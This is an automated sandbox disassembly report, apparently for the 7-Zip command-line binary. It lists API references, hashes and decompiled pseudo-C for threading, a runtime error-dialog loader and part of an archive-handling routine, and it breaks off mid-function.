0x00441a06
0x00441a0c
0x00441a0f
0x00441a12
0x00441a12
0x00441a12
0x00441a1c
0x00000000
0x00441a1c
0x0044196c
0x0044196f
0x00441972
0x00441975
0x0044197b
0x00441981
0x00441984
0x00441988
0x00441988
0x00441a21
0x00441a21
0x00441a25
0x00441a28
0x00441a2b
0x00441a2c
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0044192A
__aulldiv.LIBCMT ref: 00441AF2
__aulldiv.LIBCMT ref: 00441B04
LeaveCriticalSection.KERNEL32(?), ref: 004426C8

Part of subcall function 00443BAF: __EH_prolog.LIBCMT ref: 00443BB4

EnterCriticalSection.KERNEL32(?,?,00000000,00000004,00000004,00010000,?,00000001), ref: 004420FC
LeaveCriticalSection.KERNEL32(?), ref: 00442166
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,00000004,00000004,00010000,?,00000001), ref: 0044241C

Part of subcall function 00440F0D: __EH_prolog.LIBCMT ref: 00440F12

Part of subcall function 00467B10: SetEvent.KERNEL32(00000000,00410FDF), ref: 00467B13

LeaveCriticalSection.KERNEL32(?), ref: 004421AA

Part of subcall function 00441083: EnterCriticalSection.KERNEL32(?,00000000,?,00442557,0000001A,?,?,?,?,00000004,00000004,00010000,?,00000001), ref: 0044108B
Part of subcall function 00441083: LeaveCriticalSection.KERNEL32(?), ref: 004410AE

LeaveCriticalSection.KERNEL32(?), ref: 0044277B
LeaveCriticalSection.KERNEL32(?), ref: 0044281A

Part of subcall function 00442DE5: __EH_prolog.LIBCMT ref: 00442DEA

Part of subcall function 00442E79: __EH_prolog.LIBCMT ref: 00442E7E

Part of subcall function 0044296D: __EH_prolog.LIBCMT ref: 00442972
Part of subcall function 0044296D: DeleteCriticalSection.KERNEL32(?,?,?,004425CF,00000004,00000004,00010000,?,00000001), ref: 00442996

Part of subcall function 0044395A: __EH_prolog.LIBCMT ref: 0044395F
Part of subcall function 0044395A: DeleteCriticalSection.KERNEL32(?,?,?,004425DE,00000004,00000004,00010000,?,00000001), ref: 00443976

Part of subcall function 0043F571: __EH_prolog.LIBCMT ref: 0043F576

Strings

D, xrefs: 00441A21

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$H_prolog$Leave$DeleteEnter__aulldiv$EventMultipleObjectsWait
String ID: D
API String ID: 1344393993-2746444292
Opcode ID: ebf051fc97326ff15014fddf33e1ce4ac637c8adec1716bc8864d6dceb0aae89
Instruction ID: b7ea9ee86155e0a7c7e569c876f0c1e31397adaa9b36ed63c9e7592aed198d63
Opcode Fuzzy Hash: ebf051fc97326ff15014fddf33e1ce4ac637c8adec1716bc8864d6dceb0aae89
Instruction Fuzzy Hash: A7B27030D00288DFEB15EFA4C994BDDBBB0AF19308F54809EE54967292DB785E49CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00471C24 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E00471C24(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x493850 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x493854; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x493858; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x493850(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x493850 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x493854 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x493858 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x00471c25
0x00471c27
0x00471c2f
0x00471c73
0x00471c73
0x00471c7a
0x00471c7e
0x00471c82
0x00471c84
0x00471c8b
0x00471c90
0x00471c90
0x00471c8b
0x00471c82
0x00000000
0x00471c9f
0x00471c3c
0x00471c40
0x00471ca9
0x00000000
0x00471ca9
0x00471c4e
0x00471c52
0x00471c57
0x00000000
0x00471c59
0x00471c67
0x00471c6e
0x00000000
0x00471c6e

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00470D65,?,Microsoft Visual C++ Runtime Library,00012010,?,0047CC5C,?,0048A174,?,?,?,Runtime Error!Program: ), ref: 00471C36
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00471C4E
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00471C5F
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00471C6C

Strings

GetLastActivePopup, xrefs: 00471C61
user32.dll, xrefs: 00471C31
GetActiveWindow, xrefs: 00471C59
MessageBoxA, xrefs: 00471C48

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
Instruction ID: ea4433a42688f02017ac68f8dd25db1f7bd77ae58eff3a6fbc345d1a27d7865b
Opcode Fuzzy Hash: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
Instruction Fuzzy Hash: F1018471740311AF8722EFF99CC49AB7BE8EBA6741314847FB10DD2230DB7889418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004311FE Relevance: 8.7, APIs: 3, Strings: 1, Instructions: 1676
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E004311FE(intOrPtr __ecx, void* __edx) {
				signed int _t1032;
				signed int _t1034;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				intOrPtr* _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1058;
				signed int* _t1059;
				signed int _t1062;
				signed int _t1076;
				signed int* _t1092;
				signed int _t1093;
				signed int _t1113;
				signed int _t1114;
				signed int _t1125;
				signed int _t1127;
				intOrPtr _t1141;
				intOrPtr _t1144;
				signed int _t1149;
				signed int _t1153;
				intOrPtr _t1158;
				signed int _t1165;
				signed int _t1179;
				signed int _t1181;
				signed int _t1188;
				intOrPtr _t1193;
				signed int _t1197;
				signed int _t1206;
				void* _t1207;
				signed int _t1212;
				signed int _t1213;
				signed int _t1217;
				signed int _t1232;
				signed int _t1235;
				signed int _t1237;
				signed int _t1238;
				signed int _t1249;
				signed int* _t1254;
				signed int _t1255;
				signed int _t1268;
				signed int _t1271;
				signed int _t1272;
				signed int _t1286;
				signed int _t1287;
				signed int _t1298;
				intOrPtr _t1301;
				signed int _t1305;
				signed int _t1306;
				signed int _t1312;
				signed int _t1321;
				signed int _t1322;
				signed int _t1340;
				signed int _t1343;
				intOrPtr _t1344;
				intOrPtr _t1345;
				signed int _t1347;
				signed int _t1350;
				signed int _t1363;
				intOrPtr _t1364;
				signed int _t1367;
				signed int _t1371;
				signed int _t1372;
				intOrPtr _t1391;
				signed int _t1392;
				signed int _t1393;
				intOrPtr _t1409;
				signed int _t1414;
				signed int _t1415;
				signed int _t1417;
				void* _t1420;
				intOrPtr _t1428;
				signed int _t1429;
				signed int _t1431;
				signed int _t1434;
				intOrPtr _t1436;
				intOrPtr _t1438;
				signed int _t1441;
				void* _t1445;
				intOrPtr _t1448;
				intOrPtr _t1459;
				intOrPtr _t1543;
				intOrPtr _t1547;
				signed int _t1548;
				signed int _t1555;
				signed int _t1573;
				signed int* _t1577;
				signed int _t1589;
				intOrPtr _t1601;
				intOrPtr _t1627;
				intOrPtr _t1651;
				intOrPtr _t1657;
				signed int _t1667;
				intOrPtr* _t1694;
				signed int _t1701;
				signed int _t1706;
				signed int _t1708;
				intOrPtr* _t1709;
				signed int _t1715;
				signed int _t1719;
				signed int _t1724;
				signed int _t1728;
				intOrPtr _t1729;
				signed int _t1730;
				intOrPtr _t1733;
				intOrPtr _t1738;
				signed int* _t1740;
				intOrPtr* _t1742;
				signed int _t1745;
				signed int _t1746;
				void* _t1751;
				intOrPtr _t1757;
				intOrPtr* _t1758;
				signed int _t1759;
				intOrPtr _t1760;
				signed int _t1763;
				intOrPtr _t1764;
				signed int _t1765;
				intOrPtr* _t1767;
				signed int _t1768;
				signed int _t1769;
				signed int _t1771;
				signed int _t1774;
				signed int _t1775;
				signed int _t1776;
				intOrPtr* _t1777;
				intOrPtr _t1779;
				signed int _t1780;
				intOrPtr* _t1782;
				void* _t1785;
				void* _t1787;
				void* _t1788;
				void* _t1790;
				void* _t1824;
				void* _t1826;

				E0046B890(E00477A16, _t1785);
				_t1788 = _t1787 - 0x4c0;
				 *((intOrPtr*)(_t1785 - 0x98)) = __ecx;
				_t1448 =  *((intOrPtr*)(_t1785 + 0x1c));
				_t1445 = __edx;
				_t1032 =  *(_t1448 + 0x10);
				_t1728 =  *(_t1448 + 0x14);
				 *(_t1785 - 0x70) = _t1032;
				 *(_t1785 - 0x6c) = _t1728;
				_t1745 = 0;
				if((_t1032 | _t1728) == 0) {
					 *(_t1785 - 0x70) = 1;
					 *(_t1785 - 0x6c) = _t1745;
				}
				if(_t1445 == _t1745) {
					_t1729 = 0;
					_t1034 = 0;
					__eflags = 0;
				} else {
					_t1729 =  *((intOrPtr*)(_t1445 + 0x138));
					_t1034 =  *((intOrPtr*)(_t1445 + 0x13c));
				}
				if(_t1034 > _t1745 || _t1729 > _t1745) {
					if( *((char*)(_t1448 + 0x21)) != 0) {
						goto L9;
					}
					_push(_t1745);
					_push(_t1034);
					_push(_t1729);
					_push(_t1745);
					_push(_t1745);
					_t1076 = E00432A5E( *((intOrPtr*)(_t1785 - 0x98)),  *(_t1785 + 0x14));
					if(_t1076 != _t1745) {
						goto L286;
					}
					goto L9;
				} else {
					L9:
					E00404AD0(_t1785 - 0xd4, 4);
					 *((intOrPtr*)(_t1785 - 0xd4)) = 0x47a668;
					 *(_t1785 - 4) = _t1745;
					E00404AD0(_t1785 - 0xb4, 0xc);
					 *((intOrPtr*)(_t1785 - 0xb4)) = 0x47b41c;
					 *(_t1785 - 0x26) =  *(_t1785 - 0x26) & 0x00000000;
					_t1757 =  *((intOrPtr*)(_t1785 + 8));
					 *(_t1785 - 4) = 1;
					 *(_t1785 - 0x54) = _t1745;
					 *(_t1785 - 0x50) = _t1745;
					 *(_t1785 - 0x78) = _t1745;
					 *(_t1785 - 0x74) = _t1745;
					if(_t1445 == _t1745) {
						L43:
						_t1730 =  *(_t1757 + 8);
						 *(_t1785 - 0x34) = _t1745;
						 *(_t1785 - 0x30) = _t1745;
						 *(_t1785 - 0x10) = _t1745;
						if(_t1730 <= _t1745) {
							L55:
							_t1037 =  *(_t1785 - 0x74);
							_t1824 = _t1037 -  *(_t1785 - 0x30);
							if(_t1824 >= 0 && (_t1824 > 0 ||  *(_t1785 - 0x78) >  *(_t1785 - 0x34))) {
								 *(_t1785 - 0x30) = _t1037;
								 *(_t1785 - 0x34) =  *(_t1785 - 0x78);
							}
							_t1826 =  *(_t1785 - 0x30) - _t1745;
							if(_t1826 <= 0 && (_t1826 < 0 ||  *(_t1785 - 0x34) < 0x10000)) {
								 *(_t1785 - 0x34) = 0x10000;
								 *(_t1785 - 0x30) = _t1745;
							}
							_t1758 =  *((intOrPtr*)(_t1785 + 0x18));
							_t1040 =  *((intOrPtr*)( *_t1758 + 0xc))(_t1758,  *(_t1785 - 0x54),  *(_t1785 - 0x50));
							if(_t1040 == _t1745) {
								_push(0x38);
								_t1041 = E004079F2();
								 *(_t1785 - 0x68) = _t1041;
								__eflags = _t1041 - _t1745;
								 *(_t1785 - 4) = 2;
								if(_t1041 == _t1745) {
									_t1746 = 0;
									__eflags = 0;
								} else {
									_t1746 = E0040F3E5(_t1041);
								}
								__eflags = _t1746;
								 *(_t1785 - 0x68) = _t1746;
								 *(_t1785 - 4) = 1;
								 *(_t1785 - 0x74) = _t1746;
								if(_t1746 != 0) {
									 *((intOrPtr*)( *_t1746 + 4))(_t1746);
								}
								_push(1);
								 *(_t1785 - 4) = 3;
								E0040F478(_t1746, _t1758);
								E0043333A(_t1785 - 0x2cc, __eflags);
								__eflags =  *(_t1785 - 0xac);
								 *(_t1785 - 4) = 4;
								if( *(_t1785 - 0xac) == 0) {
									L72:
									E00405B9F(_t1785 - 0x4c);
									 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
									 *(_t1785 - 4) = 5;
									_t1759 = 4;
									do {
										E004335AA(_t1785 - 0xe8);
										_push(_t1785 - 0xe8);
										 *(_t1785 - 4) = 6;
										E004336E2(_t1785 - 0x4c);
										 *(_t1785 - 4) = 5;
										E00408604(_t1785 - 0xe8);
										_t1759 = _t1759 - 1;
										__eflags = _t1759;
									} while (_t1759 != 0);
									_t1049 =  *((intOrPtr*)(_t1785 + 0x1c));
									_t1760 =  *_t1049;
									 *(_t1785 - 0x11) =  *((intOrPtr*)(_t1049 + 8));
									__eflags =  *((intOrPtr*)(_t1760 + 8)) - 1;
									if( *((intOrPtr*)(_t1760 + 8)) != 1) {
										L76:
										_t175 = _t1785 - 0x11;
										 *_t175 =  *(_t1785 - 0x11) & 0x00000000;
										__eflags =  *_t175;
										L77:
										_t1459 =  *((intOrPtr*)(_t1785 + 8));
										 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
										__eflags =  *(_t1459 + 8);
										if( *(_t1459 + 8) <= 0) {
											L94:
											 *(_t1785 - 0xa0) =  *(_t1785 - 0xa0) & 0x00000000;
											__eflags =  *(_t1785 - 0x26);
											if(__eflags == 0) {
												L109:
												_push(0);
												_t1050 = E0042F495( *((intOrPtr*)(_t1785 + 0xc)), __eflags,  *(_t1785 + 0x14));
												__eflags = _t1050;
												 *(_t1785 + 0x14) = _t1050;
												if(_t1050 == 0) {
													_t1051 = E0042F522( *((intOrPtr*)(_t1785 + 0xc)));
													__eflags = _t1051;
													 *(_t1785 + 0x14) = _t1051;
													if(_t1051 == 0) {
														 *((intOrPtr*)(_t1746 + 0x18)) = 0;
														 *(_t1785 - 0x24) = 0;
														 *((intOrPtr*)(_t1746 + 0x1c)) = 0;
														 *(_t1785 - 0x2c) = 0;
														do {
															_t1762 =  *(_t1785 - 0x2c);
															 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x40)) +  *(_t1785 - 0x2c) * 4));
															E00428499(_t1785 - 0x1b4);
															 *(_t1785 - 4) = 0xe;
															__eflags = E0043351E( *(_t1785 - 0x2c));
															if(__eflags == 0) {
																E00428562(_t1785 - 0x1b4,  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))));
															} else {
																_push(_t1785 - 0x1b4);
																_t1730 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)) + 9));
																E00433001( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))), _t1730, __eflags);
															}
															_t1058 = E00433524(_t1762);
															__eflags = _t1058;
															if(_t1058 == 0) {
																_t1059 =  *(_t1785 - 0x184);
																 *(_t1785 - 0x188) =  *(_t1785 - 0x188) & 0x00000000;
																 *(_t1785 - 0x180) =  *(_t1785 - 0x180) & 0x00000000;
																 *_t1059 =  *_t1059 & 0x00000000;
																__eflags =  *_t1059;
															} else {
																__eflags =  *(_t1785 - 0x188);
																if(__eflags == 0) {
																	_t1372 =  *(_t1785 - 0xa0);
																	__eflags = _t1372;
																	if(__eflags != 0) {
																		__eflags = _t1372 + 8;
																		E00401E26(_t1785 - 0x184, _t1372 + 8);
																	}
																	 *(_t1785 - 0x188) = 1;
																}
															}
															_push(_t1785 - 0x1b4);
															E004283DB(_t1785 - 0x4cc, __eflags);
															_t1062 =  *(_t1785 - 0x24);
															 *(_t1785 - 4) = 0xf;
															__eflags = _t1062 -  *(_t1785 - 0xac);
															if(_t1062 >=  *(_t1785 - 0xac)) {
																L168:
																_t1763 =  *( *((intOrPtr*)(_t1785 - 0x58)) + 8);
																__eflags = _t1763;
																 *(_t1785 - 0x20) = _t1763;
																if(_t1763 == 0) {
																	goto L225;
																}
																E00404AD0(_t1785 - 0x138, 0x14);
																 *((intOrPtr*)(_t1785 - 0x138)) = 0x47b3fc;
																 *(_t1785 - 4) = 0x1c;
																E0040867E(_t1785 - 0x138, _t1763);
																__eflags =  *(_t1785 - 0x6c);
																if( *(_t1785 - 0x6c) > 0) {
																	L171:
																	 *(_t1785 - 0x9c) = 1;
																	L173:
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																	__eflags = _t1763;
																	if(_t1763 <= 0) {
																		L176:
																		E0043375E(_t1785 - 0x138, _t1730, E00432EB7, _t1785 - 0x9c);
																		E00404AD0(_t1785 - 0xfc, 4);
																		 *((intOrPtr*)(_t1785 - 0xfc)) = 0x47ab80;
																		 *(_t1785 - 4) = 0x1d;
																		E0040867E(_t1785 - 0xfc, _t1763);
																		__eflags = _t1763;
																		if(_t1763 <= 0) {
																			L179:
																			 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																			__eflags = _t1763;
																			if(_t1763 <= 0) {
																				L224:
																				 *(_t1785 - 4) = 0x1c;
																				E00408604(_t1785 - 0xfc);
																				 *(_t1785 - 4) = 0xf;
																				E00408604(_t1785 - 0x138);
																				goto L225;
																			}
																			while(1) {
																				 *(_t1785 - 0x94) = 0;
																				 *(_t1785 - 0x90) = 0;
																				 *(_t1785 - 0xc0) = 0;
																				 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																				 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																				E00401E9A(_t1785 - 0xc0, 3);
																				 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																				__eflags =  *(_t1785 - 0x10) - _t1763;
																				 *(_t1785 - 4) = 0x1e;
																				if( *(_t1785 - 0x10) >= _t1763) {
																					goto L198;
																				}
																				while(1) {
																					L183:
																					_t1555 =  *(_t1785 + 0x14);
																					_t1188 = _t1555;
																					asm("cdq");
																					__eflags = _t1730 -  *(_t1785 - 0x6c);
																					if(__eflags > 0) {
																						break;
																					}
																					if(__eflags < 0) {
																						L186:
																						_t1559 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4));
																						 *(_t1785 - 0x94) =  *(_t1785 - 0x94) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4)) + 0x20));
																						_t1193 =  *((intOrPtr*)(_t1785 + 0x1c));
																						asm("adc [ebp-0x90], edx");
																						_t1730 =  *(_t1785 - 0x90);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x1c));
																						if(__eflags > 0) {
																							break;
																						}
																						if(__eflags < 0) {
																							L189:
																							__eflags =  *((char*)(_t1193 + 0x20));
																							if( *((char*)(_t1193 + 0x20)) == 0) {
																								L194:
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																								__eflags =  *(_t1785 + 0x14) +  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																								if( *(_t1785 + 0x14) +  *(_t1785 - 0x10) <  *(_t1785 - 0x20)) {
																									continue;
																								}
																								break;
																							}
																							E00430E91(_t1559, _t1785 - 0x84);
																							__eflags =  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x1f;
																							if( *(_t1785 + 0x14) != 0) {
																								_t1730 =  *(_t1785 - 0xc0);
																								_t1197 = E0040807A(_t1730);
																								__eflags = _t1197;
																								if(_t1197 != 0) {
																									 *(_t1785 - 4) = 0x1e;
																									E00407A18( *(_t1785 - 0x84));
																									break;
																								}
																								L193:
																								 *(_t1785 - 4) = 0x1e;
																								E00407A18( *(_t1785 - 0x84));
																								goto L194;
																							}
																							E00401E26(_t1785 - 0xc0, _t1785 - 0x84);
																							goto L193;
																						}
																						_t1730 =  *(_t1785 - 0x94);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x18));
																						if(_t1730 >  *((intOrPtr*)(_t1193 + 0x18))) {
																							break;
																						}
																						goto L189;
																					}
																					__eflags = _t1188 -  *(_t1785 - 0x70);
																					if(_t1188 >=  *(_t1785 - 0x70)) {
																						break;
																					}
																					goto L186;
																				}
																				__eflags =  *(_t1785 + 0x14) - 1;
																				if( *(_t1785 + 0x14) >= 1) {
																					L199:
																					_push(0x78);
																					_t1113 = E004079F2();
																					 *(_t1785 - 0x18) = _t1113;
																					__eflags = _t1113;
																					 *(_t1785 - 4) = 0x20;
																					if(_t1113 == 0) {
																						_t1114 = 0;
																						__eflags = 0;
																					} else {
																						_t1114 = E00429B31(_t1113);
																					}
																					__eflags = _t1114;
																					 *(_t1785 - 0x1c) = _t1114;
																					 *(_t1785 - 4) = 0x1e;
																					 *(_t1785 - 0x50) = _t1114;
																					if(_t1114 != 0) {
																						 *((intOrPtr*)( *_t1114 + 4))(_t1114);
																					}
																					_push( *(_t1785 + 0x14));
																					 *(_t1785 - 4) = 0x21;
																					E00429C75( *(_t1785 - 0x1c),  *((intOrPtr*)(_t1785 + 0x18)), ( *(_t1785 - 0x10) << 2) +  *((intOrPtr*)(_t1785 - 0xf0)));
																					E0042DB56(_t1785 - 0x3a4);
																					_push(_t1746);
																					_push( *((intOrPtr*)(_t1785 + 0x10)));
																					_t1768 =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																					 *(_t1785 - 4) = 0x22;
																					_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																					_push(_t1785 - 0x3a4);
																					_push(_t1785 - 0x34);
																					_push(0);
																					_push( *(_t1785 - 0x1c));
																					_t1125 = E004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																					__eflags = _t1125;
																					 *(_t1785 - 0x18) = _t1125;
																					if(__eflags != 0) {
																						 *(_t1785 - 4) = 0x21;
																						E0042B864(_t1785 - 0x3a4, __eflags);
																						_t1127 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1127;
																						if(_t1127 != 0) {
																							 *((intOrPtr*)( *_t1127 + 8))(_t1127);
																						}
																						E00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x23;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						E0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 =  *(_t1785 - 0x18);
																					} else {
																						_t1141 =  *((intOrPtr*)(_t1785 + 0x10));
																						while(1) {
																							__eflags = _t1768 -  *((intOrPtr*)(_t1141 + 8));
																							if(_t1768 >=  *((intOrPtr*)(_t1141 + 8))) {
																								break;
																							}
																							_t1730 =  *( *((intOrPtr*)(_t1141 + 0xc)) + _t1768 * 8);
																							 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																							asm("adc [edi+0x2c], ecx");
																							_t1768 = _t1768 + 1;
																						}
																						 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x3a4);
																						_push(_t1785 - 0x3a4);
																						_t1144 =  *((intOrPtr*)(_t1785 + 0x10));
																						asm("adc [edi+0x24], edx");
																						_t693 = _t1144 + 0x3c; // 0x3c
																						E0042F063(_t693);
																						_t1769 = 0;
																						__eflags =  *(_t1785 + 0x14);
																						 *(_t1785 - 0x18) = 0;
																						if(__eflags <= 0) {
																							L221:
																							_t750 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																							E00415C6D(_t750,  *(_t1785 - 0x18));
																							_t1771 =  *(_t1785 - 0x10) +  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x21;
																							 *(_t1785 - 0x10) = _t1771;
																							E0042B864(_t1785 - 0x3a4, __eflags);
																							_t1149 =  *(_t1785 - 0x1c);
																							 *(_t1785 - 4) = 0x1e;
																							__eflags = _t1149;
																							if(_t1149 != 0) {
																								 *((intOrPtr*)( *_t1149 + 8))(_t1149);
																							}
																							 *(_t1785 - 4) = 0x1d;
																							E00407A18( *(_t1785 - 0xc0));
																							__eflags = _t1771 -  *(_t1785 - 0x20);
																							if(_t1771 <  *(_t1785 - 0x20)) {
																								_t1763 =  *(_t1785 - 0x20);
																								 *(_t1785 - 0x94) = 0;
																								 *(_t1785 - 0x90) = 0;
																								 *(_t1785 - 0xc0) = 0;
																								 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																								 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																								E00401E9A(_t1785 - 0xc0, 3);
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																								__eflags =  *(_t1785 - 0x10) - _t1763;
																								 *(_t1785 - 4) = 0x1e;
																								if( *(_t1785 - 0x10) >= _t1763) {
																									goto L198;
																								}
																								goto L183;
																							} else {
																								goto L224;
																							}
																						}
																						_t1153 =  *(_t1785 - 0x10) << 2;
																						__eflags = _t1153;
																						 *(_t1785 - 0x38) = _t1153;
																						while(1) {
																							 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *(_t1785 - 0x38) +  *((intOrPtr*)(_t1785 - 0xf0))) * 4));
																							E0042EAC2(_t1785 - 0x124);
																							_t1158 =  *((intOrPtr*)(_t1785 - 0x58));
																							 *(_t1785 - 4) = 0x24;
																							__eflags =  *((char*)(_t1158 + 0x39));
																							_push(_t1785 - 0x2f4);
																							if( *((char*)(_t1158 + 0x39)) == 0) {
																								_push(_t1785 - 0x124);
																								_push( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)))));
																								E004308F5(_t1445);
																							} else {
																								_t1730 = _t1785 - 0x124;
																								E0043327A( *((intOrPtr*)(_t1785 - 0x58)), _t1730);
																							}
																							__eflags =  *((char*)(_t1785 - 0x2d0));
																							if(__eflags != 0) {
																								break;
																							}
																							__eflags =  *((char*)(_t1785 - 0x107));
																							if(__eflags != 0) {
																								break;
																							}
																							_t1179 =  *(_t1785 - 0x1c);
																							_t1543 =  *((intOrPtr*)(_t1179 + 0x48));
																							__eflags =  *((char*)(_t1543 + _t1769));
																							if( *((char*)(_t1543 + _t1769)) != 0) {
																								 *((intOrPtr*)(_t1785 - 0x118)) =  *((intOrPtr*)( *((intOrPtr*)(_t1179 + 0x5c)) + _t1769 * 4));
																								_t1547 =  *((intOrPtr*)(_t1179 + 0x70));
